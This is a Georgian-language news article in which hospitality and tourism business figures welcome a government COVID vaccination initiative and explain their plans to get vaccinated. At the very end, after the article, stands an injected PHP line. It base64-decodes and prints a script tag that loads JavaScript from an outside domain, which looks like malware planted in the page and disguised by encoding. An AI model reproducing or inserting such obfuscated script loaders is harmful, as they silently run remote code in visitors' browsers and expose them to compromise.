celsiusi
ავერსი საქკაბელი
საინფორმაციო სააგენტო BUSINESS TIME მთავრობის გუშინდელ ინიციატივასთან დაკავშირებით სასტუმრო-სარესტორნო ბიზნესის წარმომადგენლებს გაესაუბრა. მათი უმეტესობა ვაქცინაციის პროცესს მიესალმება და მზადაა აიცრას. 
 
რესტორან „ჩვენის“ დამფუძნებელი გურამ ბაღდოშვილი მიიჩნევს, რომ ვაქცინაცია არის ერთადერთი გამოსავალი და თავადაც მზადაა აიცრას. 
 
“მე პორტუგალიის მოქალაქე ვარ, მალე წავალ და აუცილებლად ავიცრები. არ აქვს მნიშვნელობა რომელი ვაქცინა იქნება, ჯერ არ ვიცი უნდა დავაზუსტო, მთავარია იყოს სანდო და ხარისხიანი. რა თქმა უნდა მივესალმები ამ ინიციატივას, ვთხოვ და მოვთხოვ ჩემს თანამშრომლებს აიცრან. ყველა აიცრება- “ეგ არის და გორის ციხე” , უმჯობესია, რადგან მერე მაინც ვერავინ მიგვითითებს, რომ რესტორნები პანდემიის გამავრცელებელი ბუდეა, როგორც ეს ბრძანა ქალბატონმა ჯანდაცის მინისტრმა.”- განაცხადა ბაღდოშვიმა. 
 
რესტორატორთა ასოციაციის დამფუძნებელი შოთა ბურჯანაძე კი აცხადებს, რომ ერთადერთი გამოსავალი არის ვაქცინაცია და თავად საჯაროდ აიცრება. 
 
“მისასალმებელია, თუ ადგილობრივებიც და ტურისტებიც უსაფრთხოდ იგრძნობენ თავს იმ რეალობაში სადაც უნდა მიიღონ მომსახურება, ეს რა თქმა უნდა დადებითად იმოქმედებს იმ გამოწვევებზე, რომლის წინაშეც ეს სფერო დგას. ცალკე საკითხია რამდენად მიიღებენ მომუშავე ადამიანები ამ ინიციატივას, ვაქცინასთან დაკავშირებული არაერთგვაროვანი დამოკიდებულებიდან გამომდინარე, თუმცა მე მაინც იმედი მაქ რომ დადებითად მიიღებენ. მე პირადად სამაგალითოდ ავიცრები, ვინაიდან მიმაჩნია, რომ სხვაგვარად ეს პრობლემა ვერ გადაიჭრება და ეს ლოქდაუნები, ჩაკეტვები და  მერე გახსნები არის დროებითი და კატათაგვობანას თამაში. “ - განაცხადა ბურჯანაძემ. 
 
ტურიზმის ეროვნული ადმინისტრაციის ყოფილ ხელმძღვანელის, „პრო-თრეველ ჯორჯიას“ მმართველი პარტნიორის მაია სიდამონიძის  თქმით, ის მიესალმება ვაქცინაციის პროცეს და მიიჩნევს, რომ აუცილებელია დროულად ქვეყანაში საკმარისი რაოდენობის ვაქცინის შემოტანა, რათა ადამიანებისთვის ხელმისაწვდომი იყოს.
 
“მე მივესალმები ვაქცინაციას და აუცილებლად ავიცრებოდი, მაგრამ ვარ ორსულად და ამ ეტაპზე არ შეიძლება.  ასევე მისასალმებელია ინიციატივა, რომ მოხდეს ტურიზმის ინდუსტრიის წახალისება, მაგრამ აუცილებელია ამისათვის იყოს საკმარისი რაოდენობის ვაქცინა ქვეყანაში, არიან ჩემს ირგვლივ ადამიანები ვინც რუსთავში და ბათუში წავიდა აცრისთვის, იმიტომ რომ თბილისში უკვე აღარ არის. რაც შეეხება სანდოობას ჩინური ვაქცინის მიმართ, ვენდობი იმდენად, რამდენადაც უკვე გავრცელებული ინფორმაციით, ჯანმოს წინასწარი მონაცემების მიხედვით აქვს მაღალი ეფექტურობა, ვფიქრობ ავტორიზაციასაც მალე გამოაცხადებენ”-  განაცხადა სიდამონიძემ.
 
 
 
 
 
 
1287
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");